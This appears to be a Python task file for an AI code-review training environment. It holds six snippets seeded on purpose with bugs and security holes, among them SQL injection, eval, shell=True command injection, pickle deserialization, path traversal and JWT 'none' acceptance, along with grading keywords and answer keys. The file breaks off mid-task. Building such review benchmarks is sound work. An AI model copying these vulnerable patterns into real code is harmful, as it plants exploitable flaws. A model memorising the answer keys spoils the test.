Spaces:
Runtime error
Runtime error
| """ | |
| Task definitions for the PRobe environment. | |
| Six tasks across four difficulty tiers. Each task defines: | |
| - code: Python source to review | |
| - issues: list of ground-truth issues with grading metadata | |
| - correct_decision: expected final review decision | |
| Difficulty ladder: | |
| 0 ultra-easy β hints embedded in comments; bootstraps GRPO positive trajectories | |
| 1 easy β 3 clean logic bugs, no hints | |
| 2 medium β 5 security issues in an auth module | |
| 3 hard β 7 mixed issues in a data pipeline | |
| 4 medium β 5 async concurrency bugs | |
| 5 hard β 6 Flask API security issues | |
| """ | |
| from typing import Any | |
| TASKS: list[dict[str, Any]] = [ | |
| # ββ Task 0: Ultra-easy (bootstrap) βββββββββββββββββββββββββββββββββββββββ | |
| # DESIGN INTENT: both issues have their category name spelled out in a code | |
| # comment directly above them. A frozen weak model that simply reads the | |
| # comments and echoes them back should reliably score > 0. This task exists | |
| # solely to guarantee that GRPO has at least a few positive trajectories from | |
| # training step 1. | |
| { | |
| "id": 0, | |
| "name": "Bootstrap: Obvious Issues", | |
| "difficulty": "ultra-easy", | |
| "file_name": "bootstrap.py", | |
| "description": ( | |
| "Review this short Python module. " | |
| "The comments above each function hint at the kind of issue present. " | |
| "Add a comment for each bug you find (line number, severity, category), " | |
| "call request_changes, then submit." | |
| ), | |
| "max_steps": 6, | |
| "code": """\ | |
| # BUG: this loop has an off-by-one error β it iterates one index too far | |
| def sum_items(data): | |
| total = 0 | |
| for i in range(len(data) + 1): # line 4: causes IndexError on last iteration | |
| total += data[i] | |
| return total | |
| # SECURITY: hardcoded credential β move to environment variable | |
| def connect_db(): | |
| db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source | |
| return f"postgresql://admin:{db_password}@localhost/mydb" | |
| """, | |
| "issues": [ | |
| { | |
| "id": "bootstrap_off_by_one", | |
| "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", | |
| "line_range": (4, 4), | |
| "keywords": [ | |
| "off-by-one", "off by one", "bug", "index", "indexerror", | |
| "range", "+ 1", "len + 1", "out of bounds", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "bootstrap_hardcoded_cred", | |
| "description": "Hardcoded password in source should be an environment variable", | |
| "line_range": (11, 11), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "security", "credential", "password", | |
| "secret", "env", "environment variable", "os.environ", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ββ Task 1: Easy βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| { | |
| "id": 1, | |
| "name": "Basic Bug Detection", | |
| "difficulty": "easy", | |
| "file_name": "utils.py", | |
| "description": ( | |
| "Review this Python utility module. " | |
| "Identify any bugs, logical errors, or code quality issues. " | |
| "Add a comment for each issue you find (include line number, severity, " | |
| "and category), then submit your review." | |
| ), | |
| "max_steps": 15, | |
| "code": """\ | |
| def calculate_average(numbers): | |
| \"\"\"Calculate the average of a list of numbers.\"\"\" | |
| total = 0 | |
| for i in range(len(numbers) + 1): # line 4 | |
| total += numbers[i] | |
| average = total / len(numbers) | |
| unused_result = sorted(numbers) # line 7 | |
| return average | |
| def find_max(items): | |
| \"\"\"Return the maximum value in a list.\"\"\" | |
| if len(items) == 0: | |
| return None | |
| max_val = items[0] | |
| for item in items: | |
| if item > max_val: | |
| max_val == item # line 17: should be =, not == | |
| return max_val | |
| def is_palindrome(s): | |
| \"\"\"Check if a string is a palindrome.\"\"\" | |
| return s == s[::-1] | |
| """, | |
| "issues": [ | |
| { | |
| "id": "off_by_one", | |
| "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", | |
| "line_range": (4, 5), | |
| "keywords": [ | |
| "off-by-one", "off by one", "range", "index", "indexerror", | |
| "out of bounds", "len + 1", "+ 1", "index out", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "unused_variable", | |
| "description": "unused_result is assigned but never used", | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "unused", "unused_result", "never used", "dead code", | |
| "not used", "unnecessary", | |
| ], | |
| "category": "style", | |
| "severity": "info", | |
| "weight": 0.5, | |
| }, | |
| { | |
| "id": "assignment_not_update", | |
| "description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated", | |
| "line_range": (17, 17), | |
| "keywords": [ | |
| "==", "assignment", "comparison", "max_val", "never update", | |
| "not updating", "wrong operator", "should be =", "max never", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ββ Task 2: Medium βββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| { | |
| "id": 2, | |
| "name": "Security Vulnerability Review", | |
| "difficulty": "medium", | |
| "file_name": "auth.py", | |
| "description": ( | |
| "Review this authentication module for security vulnerabilities. " | |
| "Pay careful attention to credential handling, input sanitization, " | |
| "and cryptographic choices. Annotate every issue with its severity " | |
| "and category, then submit your review." | |
| ), | |
| "max_steps": 20, | |
| "code": """\ | |
| import sqlite3 | |
| import hashlib | |
| import os | |
| DB_PASSWORD = "super_secret_123" # line 5 | |
| ADMIN_TOKEN = "tok_admin_abc123" # line 6 | |
| def authenticate_user(username, password): | |
| \"\"\"Authenticate a user against the database.\"\"\" | |
| conn = sqlite3.connect('app.db') | |
| cursor = conn.cursor() | |
| # line 12: f-string interpolation β SQL injection | |
| query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" | |
| cursor.execute(query) | |
| user = cursor.fetchone() | |
| conn.close() | |
| return user is not None | |
| def hash_password(password): | |
| \"\"\"Hash a password for storage.\"\"\" | |
| return hashlib.md5(password.encode()).hexdigest() # line 21 | |
| def execute_admin_command(command): | |
| \"\"\"Execute an admin maintenance command.\"\"\" | |
| result = eval(command) # line 25 | |
| return result | |
| def get_user_data(user_id): | |
| \"\"\"Fetch user profile from internal service.\"\"\" | |
| import requests | |
| url = f"https://internal-api/users/{user_id}" | |
| response = requests.get(url, verify=False) # line 32 | |
| return response.json() | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_credentials", | |
| "description": "Credentials hard-coded in source (lines 5-6)", | |
| "line_range": (5, 6), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "hard coded", "hardcode", | |
| "db_password", "admin_token", "plaintext credential", | |
| "environment variable", "env var", "os.environ", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "sql_injection", | |
| "description": "SQL injection via unsanitised f-string interpolation", | |
| "line_range": (12, 14), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "sanitize", "escape", "prepared statement", "placeholder", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "weak_hashing", | |
| "description": "MD5 is cryptographically broken for password storage", | |
| "line_range": (21, 21), | |
| "keywords": [ | |
| "md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt", | |
| "cryptographic", "password hashing", "hash", "broken", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "arbitrary_code_execution", | |
| "description": "eval() on untrusted input allows arbitrary code execution", | |
| "line_range": (25, 25), | |
| "keywords": [ | |
| "eval", "arbitrary code", "code execution", "rce", | |
| "remote code", "dangerous", "unsafe", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "ssl_verification_disabled", | |
| "description": "verify=False disables TLS cert validation, enabling MITM attacks", | |
| "line_range": (32, 32), | |
| "keywords": [ | |
| "ssl", "verify", "certificate", "mitm", | |
| "man-in-the-middle", "tls", "verify=false", "cert", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ββ Task 3: Hard βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| { | |
| "id": 3, | |
| "name": "Full Architecture and Performance Review", | |
| "difficulty": "hard", | |
| "file_name": "data_pipeline.py", | |
| "description": ( | |
| "Perform a comprehensive review of this data pipeline. " | |
| "Identify bugs, security vulnerabilities, performance bottlenecks, " | |
| "and architectural design issues. Each comment should clearly explain " | |
| "the problem and suggest a fix. Submit your review when done." | |
| ), | |
| "max_steps": 30, | |
| "code": """\ | |
| import requests | |
| import json | |
| import time | |
| from threading import Thread | |
| API_KEY = "sk-prod-abc123def456" # line 6 | |
| class DataPipeline: | |
| def __init__(self, endpoint): | |
| self.endpoint = endpoint | |
| self.results = [] | |
| self.cache = {} # line 13: unbounded | |
| def fetch_batch(self, item_ids): | |
| \"\"\"Fetch items from the API.\"\"\" | |
| items = [] | |
| for item_id in item_ids: # line 17: N+1 pattern | |
| response = requests.get( | |
| f"{self.endpoint}/items/{item_id}", | |
| headers={"Authorization": f"Bearer {API_KEY}"}, | |
| verify=False, # line 22 | |
| ) | |
| items.append(response.json()) | |
| return items | |
| def process_items(self, items): | |
| \"\"\"Transform items for storage.\"\"\" | |
| results = [] | |
| for i in range(len(items)): # line 28: use enumerate | |
| item = items[i] | |
| transformed = { | |
| "id": item["id"], # line 31: KeyError not handled | |
| "value": item["value"] * 2, | |
| "label": item.get("label", "unknown"), | |
| } | |
| results.append(transformed) | |
| self.cache[item["id"]] = transformed # line 36 | |
| return results | |
| def run_async(self, func, *args): | |
| \"\"\"Run function in a background thread.\"\"\" | |
| t = Thread(target=func, args=args) | |
| t.start() | |
| # line 43: thread not tracked or joined β resource leak | |
| def save_results(self, results, output_path): | |
| \"\"\"Persist results to disk.\"\"\" | |
| with open(output_path, "w") as f: | |
| json.dump(results, f) | |
| def retry_failed(self, failed_ids, max_retries=10): # line 50 | |
| \"\"\"Re-fetch items that previously failed.\"\"\" | |
| for item_id in failed_ids: | |
| for attempt in range(max_retries): | |
| try: | |
| result = requests.get( | |
| f"{self.endpoint}/items/{item_id}" | |
| ) | |
| if result.status_code == 200: | |
| self.results.append(result.json()) | |
| break | |
| except Exception: | |
| time.sleep(1) # line 60: no exponential backoff | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_api_key", | |
| "description": "API key hard-coded in source instead of an environment variable", | |
| "line_range": (6, 6), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "hardcode", "api key", "api_key", | |
| "environment variable", "env var", "os.environ", "sk-prod", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals batch endpoint docs β shows N+1 was also avoidable | |
| "unlocks": "api_docs_hint", | |
| }, | |
| { | |
| "id": "n_plus_one_requests", | |
| "description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint", | |
| "line_range": (17, 24), | |
| "keywords": [ | |
| "n+1", "n plus 1", "batch", "bulk", "loop", | |
| "individual request", "serial", "one request per", | |
| ], | |
| "category": "performance", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "ssl_disabled", | |
| "description": "SSL certificate verification disabled (verify=False)", | |
| "line_range": (22, 22), | |
| "keywords": [ | |
| "ssl", "verify", "certificate", "tls", | |
| "mitm", "verify=false", "cert", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| # Reveals network topology β confirms direct internet exposure | |
| "unlocks": "network_topology_hint", | |
| }, | |
| { | |
| "id": "missing_key_error_handling", | |
| "description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads", | |
| "line_range": (31, 32), | |
| "keywords": [ | |
| "keyerror", "key error", "error handling", "missing key", | |
| "exception", "try", ".get(", "dict access", | |
| ], | |
| "category": "bug", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "unbounded_cache", | |
| "description": "self.cache grows without bound; will cause OOM on large inputs", | |
| "line_range": (13, 13), | |
| "keywords": [ | |
| "unbounded", "memory leak", "cache size", "limit", | |
| "lru", "eviction", "grow", "oom", "memory", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "thread_not_joined", | |
| "description": "Thread is started but never stored or joined β silent resource/exception leak", | |
| "line_range": (40, 43), | |
| "keywords": [ | |
| "thread", "join", "track", "resource leak", | |
| "daemon", "not joined", "not tracked", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "no_exponential_backoff", | |
| "description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API", | |
| "line_range": (50, 60), | |
| "keywords": [ | |
| "backoff", "exponential", "retry", "sleep", "rate limit", | |
| "jitter", "aggressive", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.5, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ββ Causal context hints ββββββββββββββββββββββββββββββββββββββββββ | |
| # Finding the hardcoded API key reveals the upstream API docs, showing | |
| # a bulk endpoint exists β making the N+1 pattern even more damning. | |
| # Finding the SSL issue reveals the network topology, confirming the | |
| # service is directly internet-facing with no TLS termination proxy. | |
| "context_hints": { | |
| "api_docs_hint": ( | |
| "=== UNLOCKED: Upstream API Documentation (excerpt) ===\n" | |
| " GET /items/{id} β fetch a single item\n" | |
| " POST /items/batch β fetch up to 500 items in one request\n" | |
| " body: {\"ids\": [1, 2, ...]}\n" | |
| "NOTE: A batch endpoint already exists. The current code issues one\n" | |
| "request per item instead of using /items/batch, amplifying the\n" | |
| "credential-exposure risk: every request carries the leaked API_KEY." | |
| ), | |
| "network_topology_hint": ( | |
| "=== UNLOCKED: Deployment Network Map ===\n" | |
| " Internet β DataPipeline service (no TLS proxy) β upstream API\n" | |
| " The DataPipeline pod has a public IP and no WAF in front of it.\n" | |
| "NOTE: verify=False combined with direct internet exposure means\n" | |
| "any network path between the pod and the upstream API is vulnerable\n" | |
| "to a man-in-the-middle attack with no detection mechanism." | |
| ), | |
| }, | |
| }, | |
| # ββ Task 4: Medium β Async Concurrency βββββββββββββββββββββββββββββββ | |
| { | |
| "id": 4, | |
| "name": "Async Worker Review", | |
| "difficulty": "medium", | |
| "file_name": "async_worker.py", | |
| "description": ( | |
| "Review this async worker module for concurrency bugs, " | |
| "resource leaks, and exception-handling problems. " | |
| "Comment on every issue with its line number, severity, " | |
| "and category, then submit your review." | |
| ), | |
| "max_steps": 20, | |
| "code": """\ | |
| import asyncio | |
| import aiohttp | |
| _counter = 0 # line 3: shared mutable state, not thread/task-safe | |
| async def fetch_url(url: str) -> dict: | |
| \"\"\"Fetch a URL and return JSON.\"\"\" | |
| session = aiohttp.ClientSession() # line 7: session never closed β resource leak | |
| async with session.get(url) as resp: | |
| return await resp.json() | |
| async def increment_and_fetch(url: str) -> dict: | |
| \"\"\"Increment shared counter then fetch.\"\"\" | |
| global _counter | |
| _counter += 1 # line 15: race condition β not atomic in concurrent tasks | |
| data = fetch_url(url) # line 16: missing await β returns coroutine, not result | |
| return data | |
| async def run_all(urls: list) -> list: | |
| \"\"\"Run all fetches concurrently.\"\"\" | |
| tasks = [increment_and_fetch(u) for u in urls] | |
| results = [] | |
| for coro in tasks: | |
| try: | |
| result = await coro | |
| results.append(result) | |
| except Exception: | |
| pass # line 27: swallows all exceptions silently | |
| return results | |
| async def retry_fetch(url: str, retries: int = 3) -> dict: | |
| \"\"\"Fetch with retry logic.\"\"\" | |
| for attempt in range(retries): | |
| try: | |
| return await fetch_url(url) | |
| except Exception as e: | |
| if attempt == retries - 1: | |
| raise | |
| await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff | |
| """, | |
| "issues": [ | |
| { | |
| "id": "shared_mutable_state", | |
| "description": "Module-level _counter mutated by concurrent tasks without a lock", | |
| "line_range": (3, 3), | |
| "keywords": [ | |
| "shared", "race condition", "thread-safe", "task-safe", | |
| "atomic", "lock", "asyncio.lock", "concurrent", "global", | |
| "mutable", "not safe", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "unclosed_session", | |
| "description": "aiohttp.ClientSession created inside function is never closed β resource leak", | |
| "line_range": (7, 9), | |
| "keywords": [ | |
| "session", "not closed", "resource leak", "close", "context manager", | |
| "async with", "clientsession", "leak", "aiohttp", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "missing_await", | |
| "description": "fetch_url(url) called without await β returns unawaited coroutine", | |
| "line_range": (16, 16), | |
| "keywords": [ | |
| "await", "missing await", "coroutine", "not awaited", "unawaited", | |
| "returns coroutine", | |
| ], | |
| "category": "bug", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "silent_exception", | |
| "description": "bare except: pass swallows all exceptions, hiding errors", | |
| "line_range": (27, 27), | |
| "keywords": [ | |
| "swallow", "silent", "bare except", "exception", "pass", | |
| "ignore", "hidden", "suppress", "logging", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "no_backoff", | |
| "description": "Retry sleep is flat 1 s; should use exponential backoff with jitter", | |
| "line_range": (38, 38), | |
| "keywords": [ | |
| "backoff", "exponential", "jitter", "retry", "sleep", | |
| "flat", "rate limit", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.5, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ββ Task 5: Hard β Flask API Vulnerabilities ββββββββββββββββββββββββββ | |
| { | |
| "id": 5, | |
| "name": "Flask API Security Review", | |
| "difficulty": "hard", | |
| "file_name": "api_server.py", | |
| "description": ( | |
| "Perform a thorough security review of this Flask REST API. " | |
| "Look for injection flaws, path traversal, insecure deserialization, " | |
| "sensitive data exposure, and missing access controls. " | |
| "Comment on every issue, then submit your review." | |
| ), | |
| "max_steps": 30, | |
| "code": """\ | |
| import os | |
| import pickle | |
| import subprocess | |
| import logging | |
| from flask import Flask, request, jsonify, send_file | |
| app = Flask(__name__) | |
| SECRET_KEY = "flask-secret-hardcoded" # line 8 | |
| logging.basicConfig(level=logging.DEBUG) | |
| @app.route("/run", methods=["POST"]) | |
| def run_command(): | |
| \"\"\"Run a system command and return output.\"\"\" | |
| cmd = request.json.get("command", "") | |
| # line 15: unsanitised shell command β OS command injection | |
| result = subprocess.check_output(cmd, shell=True, text=True) | |
| return jsonify({"output": result}) | |
| @app.route("/files", methods=["GET"]) | |
| def get_file(): | |
| \"\"\"Serve a file from the data directory.\"\"\" | |
| filename = request.args.get("name", "") | |
| # line 23: no path normalisation β path traversal | |
| path = os.path.join("/app/data", filename) | |
| return send_file(path) | |
| @app.route("/load", methods=["POST"]) | |
| def load_object(): | |
| \"\"\"Deserialise a user-supplied payload.\"\"\" | |
| data = request.get_data() | |
| # line 30: pickle.loads on untrusted data β arbitrary code execution | |
| obj = pickle.loads(data) | |
| return jsonify({"type": str(type(obj))}) | |
| @app.route("/login", methods=["POST"]) | |
| def login(): | |
| \"\"\"Authenticate and return a token.\"\"\" | |
| username = request.json.get("username") | |
| password = request.json.get("password") | |
| # line 38: credentials logged at DEBUG level | |
| logging.debug(f"Login attempt: username={username} password={password}") | |
| if username == "admin" and password == SECRET_KEY: | |
| return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response | |
| return jsonify({"error": "unauthorized"}), 401 | |
| @app.route("/admin", methods=["GET"]) | |
| def admin_panel(): | |
| \"\"\"Return admin data β no auth check.\"\"\" | |
| # line 47: no authentication or authorisation check | |
| return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}}) | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_secret", | |
| "description": "Flask SECRET_KEY hard-coded in source; should come from env var", | |
| "line_range": (8, 8), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "secret_key", "environment variable", | |
| "env var", "os.environ", "secret", "hardcode", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "command_injection", | |
| "description": "subprocess.check_output with shell=True and unsanitised user input β OS command injection", | |
| "line_range": (15, 16), | |
| "keywords": [ | |
| "command injection", "shell injection", "shell=true", "subprocess", | |
| "os injection", "arbitrary command", "unsanitised", "sanitize", | |
| "injection", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals server deployment config β shows shell access = full host compromise | |
| "unlocks": "server_config_hint", | |
| }, | |
| { | |
| "id": "path_traversal", | |
| "description": "No path normalisation allows ../../../etc/passwd-style traversal", | |
| "line_range": (23, 24), | |
| "keywords": [ | |
| "path traversal", "directory traversal", "path normaliz", | |
| "os.path.abspath", "realpath", "../", "dot dot", | |
| "escape", "filename", "traversal", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "insecure_deserialization", | |
| "description": "pickle.loads on untrusted user data allows arbitrary code execution", | |
| "line_range": (30, 31), | |
| "keywords": [ | |
| "pickle", "deserialization", "deserialisation", "arbitrary code", | |
| "untrusted", "rce", "remote code", "insecure deserialization", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals client usage pattern β shows external clients send pickle payloads | |
| "unlocks": "client_usage_hint", | |
| }, | |
| { | |
| "id": "credentials_in_logs", | |
| "description": "Plaintext username and password written to DEBUG log", | |
| "line_range": (38, 38), | |
| "keywords": [ | |
| "log", "logging", "credential", "password", "sensitive", | |
| "plaintext", "debug", "leak", "exposure", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "missing_auth_check", | |
| "description": "Admin endpoint has no authentication or authorisation guard", | |
| "line_range": (47, 47), | |
| "keywords": [ | |
| "auth", "authentication", "authorization", "authorisation", | |
| "access control", "no check", "unprotected", "unauthenticated", | |
| "missing auth", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ββ Causal context hints ββββββββββββββββββββββββββββββββββββββββββ | |
| # Finding command_injection reveals the host deployment context, | |
| # escalating severity from "code bug" to "full host compromise". | |
| # Finding insecure_deserialization reveals client usage patterns, | |
| # confirming the /load endpoint is actively used by external scripts. | |
| "context_hints": { | |
| "server_config_hint": ( | |
| "=== UNLOCKED: Server Deployment Configuration ===\n" | |
| " The Flask app runs as root inside a Docker container with:\n" | |
| " --privileged flag set\n" | |
| " host network mode (--network=host)\n" | |
| " /var/run/docker.sock mounted read-write\n" | |
| "NOTE: Command injection on this host is not just a container escape β\n" | |
| "the app runs as root with Docker socket access, giving an attacker\n" | |
| "full control of the host and all sibling containers." | |
| ), | |
| "client_usage_hint": ( | |
| "=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n" | |
| " # Example client code used by 3 internal services:\n" | |
| " import pickle, requests\n" | |
| " payload = pickle.dumps(MyObject(user_input))\n" | |
| " requests.post('https://api.internal/load', data=payload)\n" | |
| "NOTE: At least 3 internal services send user-controlled pickle\n" | |
| "payloads to /load. Any of those services being compromised allows\n" | |
| "a lateral-movement RCE attack through this endpoint." | |
| ), | |
| }, | |
| }, | |
| # ββ Task 6: Causal Chain β Secrets Leak Investigation ββββββββββββββββββββ | |
| # | |
| # WORLD-MODELING DESIGN | |
| # βββββββββββββββββββββ | |
| # This task implements a *causal observation chain*: | |
| # | |
| # Phase 1 (lines visible from the start) | |
| # The agent sees a Flask service with two obvious surface issues. | |
| # Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context. | |
| # | |
| # Phase 2 (revealed after issue A is found) | |
| # A hidden DB schema snippet is appended to the observation, exposing | |
| # a privilege-escalation path that only makes sense once the secret | |
| # leak is understood. This rewards genuine causal reasoning: | |
| # "the leaked secret lets an attacker forge admin tokens β they can | |
| # reach the unguarded /admin/promote endpoint β full privilege | |
| # escalation." | |
| # | |
| # Phase 3 (revealed after issue B is found) | |
| # After the agent flags the missing rate-limit, the server's nginx | |
| # config fragment is revealed, showing that /auth is also missing | |
| # the global IP-allowlist β confirming the attack surface is wider | |
| # than the code alone suggests. | |
| # | |
| # The chained field `"unlocks"` in each issue entry names the context_key | |
| # that the environment injects into the observation when that issue is found. | |
| # The environment layer reads this and appends the hint to `context_hints`. | |
| { | |
| "id": 6, | |
| "name": "Causal Secrets Leak Investigation", | |
| "difficulty": "hard", | |
| "file_name": "auth_service.py", | |
| "description": ( | |
| "Review this authentication service carefully. " | |
| "Some issues unlock additional context about the wider system β " | |
| "read every new hint you receive before continuing. " | |
| "Use get_context on any suspicious line to reveal surrounding detail. " | |
| "Identify all issues, then submit your review." | |
| ), | |
| "max_steps": 35, | |
| "code": """\ | |
| import jwt | |
| import sqlite3 | |
| import time | |
| from flask import Flask, request, jsonify | |
| app = Flask(__name__) | |
| # ---- configuration ---------------------------------------------------------- | |
| JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret | |
| JWT_ALGORITHM = "HS256" | |
| # ---- helpers ---------------------------------------------------------------- | |
| def create_token(user_id: int, role: str) -> str: | |
| payload = { | |
| "sub": user_id, | |
| "role": role, | |
| "exp": time.time() + 3600, | |
| } | |
| return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) | |
| def verify_token(token: str) -> dict: | |
| # line 23: algorithm not pinned β accepts ["none"] attack if lib < 2.0 | |
| return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"]) | |
| # ---- routes ----------------------------------------------------------------- | |
| @app.route("/auth", methods=["POST"]) | |
| def authenticate(): | |
| \"\"\"Issue a JWT for valid credentials.\"\"\" | |
| body = request.get_json(force=True) | |
| uname = body.get("username", "") | |
| pwd = body.get("password", "") | |
| # line 33: no rate limiting β brute-force possible | |
| conn = sqlite3.connect("users.db") | |
| cursor = conn.cursor() | |
| # line 37: f-string SQL β injection | |
| cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'") | |
| row = cursor.fetchone() | |
| conn.close() | |
| if row: | |
| return jsonify({"token": create_token(row[0], row[1])}) | |
| return jsonify({"error": "invalid credentials"}), 401 | |
| @app.route("/admin/promote", methods=["POST"]) | |
| def promote_user(): | |
| \"\"\"Promote a user to admin β JWT required.\"\"\" | |
| token = request.headers.get("Authorization", "").replace("Bearer ", "") | |
| try: | |
| claims = verify_token(token) | |
| except Exception: | |
| return jsonify({"error": "unauthorized"}), 401 | |
| # line 51: role taken directly from token β no DB re-validation | |
| if claims.get("role") == "admin": | |
| target = request.json.get("user_id") | |
| conn = sqlite3.connect("users.db") | |
| conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection | |
| conn.commit() | |
| conn.close() | |
| return jsonify({"promoted": target}) | |
| return jsonify({"error": "forbidden"}), 403 | |
| """, | |
| # ββ Ground-truth issues βββββββββββββββββββββββββββββββββββββββββββ | |
| "issues": [ | |
| { | |
| "id": "hardcoded_jwt_secret", | |
| "description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens", | |
| "line_range": (9, 9), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "jwt_secret", "secret", "jwt", | |
| "environment variable", "env var", "os.environ", "forge", | |
| "hardcode", "token secret", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Finding this issue unlocks the DB schema context hint | |
| "unlocks": "db_schema_hint", | |
| }, | |
| { | |
| "id": "jwt_none_algorithm", | |
| "description": ( | |
| "jwt.decode accepts 'none' algorithm β attacker can craft an " | |
| "unsigned token and bypass signature verification" | |
| ), | |
| "line_range": (23, 24), | |
| "keywords": [ | |
| "none", "algorithm", "alg", "unsigned", "bypass", | |
| "jwt", "signature", "verify", "none algorithm", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "no_rate_limit", | |
| "description": "/auth endpoint has no rate limiting β susceptible to brute-force", | |
| "line_range": (33, 34), | |
| "keywords": [ | |
| "rate limit", "rate-limit", "brute force", "brute-force", | |
| "throttle", "throttling", "flood", "limit", "attempts", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| # Finding this unlocks the nginx config hint | |
| "unlocks": "nginx_config_hint", | |
| }, | |
| { | |
| "id": "sql_injection_auth", | |
| "description": "f-string interpolation in SQL query on /auth β injection", | |
| "line_range": (37, 38), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "sanitize", "escape", "prepared statement", "placeholder", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "role_from_token_only", | |
| "description": ( | |
| "Role is read directly from the JWT payload without re-checking the DB β " | |
| "a forged or stale token grants permanent privilege" | |
| ), | |
| "line_range": (51, 52), | |
| "keywords": [ | |
| "role", "token", "db", "database", "re-check", "revalidat", | |
| "stale", "privilege", "escalation", "claims", "payload", | |
| "not verified", "trust", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "sql_injection_promote", | |
| "description": "f-string SQL in /admin/promote UPDATE query β second-order injection", | |
| "line_range": (55, 55), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "prepared statement", "placeholder", "update", "second order", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ββ Causal context hints β revealed progressively βββββββββββββββββ | |
| # Each value is injected into the observation once the triggering | |
